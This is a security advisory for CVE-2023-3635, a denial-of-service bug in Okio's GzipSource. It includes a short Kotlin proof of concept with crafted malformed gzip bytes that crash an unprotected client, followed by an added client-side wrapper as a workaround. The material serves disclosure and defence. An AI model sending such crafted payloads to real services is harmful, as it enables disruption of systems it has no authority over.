JFrog Security Research

XRAY-589879 - Okio GzipSource unhandled exception Denial of Service

CVE-2023-3635 | CVSS 5.9

JFrog Severity: medium

Discovered by Uriya Yavnieli of the JFrog Security Research Team

Published 12 Jul, 2023 | Last updated 12 Jul, 2023

Okio GzipSource unhandled exception Denial of Service

GzipSource does not handle an exception that may be raised while parsing a malformed gzip buffer. An Okio client that decodes a crafted GZIP archive through the GzipSource class can therefore be crashed by that unhandled exception, resulting in denial of service.

import java.io.IOException
import okio.Buffer
import okio.ByteString
import okio.ByteString.Companion.decodeHex
import okio.GzipSource

val gzBuf: Buffer = Buffer()
try {
    val gzByteString: ByteString = "1f8b41ff424242424343ffff".decodeHex() // crafted, malformed gzip header
    gzBuf.write(gzByteString) // load the crafted bytes into the source buffer so GzipSource parses them
    val gz: GzipSource = GzipSource(gzBuf)
    val sinkBuf: Buffer = Buffer()
    gz.read(sinkBuf, 5) // header parsing raises an exception that this IOException handler does not catch
} catch (e: IOException) {
    println("got error: " + e.toString())
}

No mitigations are supplied for this issue
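The advisory lists no mitigation. As an added example, not part of the advisory or of the Okio project, the client-side wrapper below keeps a caller alive on crafted input by converting any runtime exception that escapes GzipSource.read into an IOException, so the IOException handler used in the proof of concept above also covers it. The class and function names are assumptions, and the wrapper is a workaround for callers, not the upstream fix.

```kotlin
import java.io.IOException
import okio.Buffer
import okio.ByteString.Companion.decodeHex
import okio.GzipSource
import okio.Source
import okio.buffer

// Hypothetical wrapper: delegates to GzipSource but guarantees that a malformed
// stream surfaces as an IOException rather than an unchecked exception.
class GuardedGzipSource(source: Source) : Source {
    private val delegate = GzipSource(source)

    override fun read(sink: Buffer, byteCount: Long): Long =
        try {
            delegate.read(sink, byteCount)
        } catch (e: IOException) {
            throw e // already the checked, expected failure type
        } catch (e: RuntimeException) {
            // Assumption: a crafted archive can make header parsing throw a runtime
            // exception; wrap it so existing IOException handling applies.
            throw IOException("malformed gzip stream", e)
        }

    override fun timeout() = delegate.timeout()
    override fun close() = delegate.close()
}

// Decompress an untrusted gzip payload; every failure mode is reported as IOException.
fun decompressUntrusted(compressed: Buffer): Buffer {
    val out = Buffer()
    GuardedGzipSource(compressed).buffer().use { src -> src.readAll(out) }
    return out
}

fun main() {
    // Constructed input: the malformed header bytes quoted in the advisory.
    val crafted = Buffer().write("1f8b41ff424242424343ffff".decodeHex())
    try {
        decompressUntrusted(crafted)
    } catch (e: IOException) {
        println("rejected malformed input: $e") // process survives instead of crashing
    }
}
```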

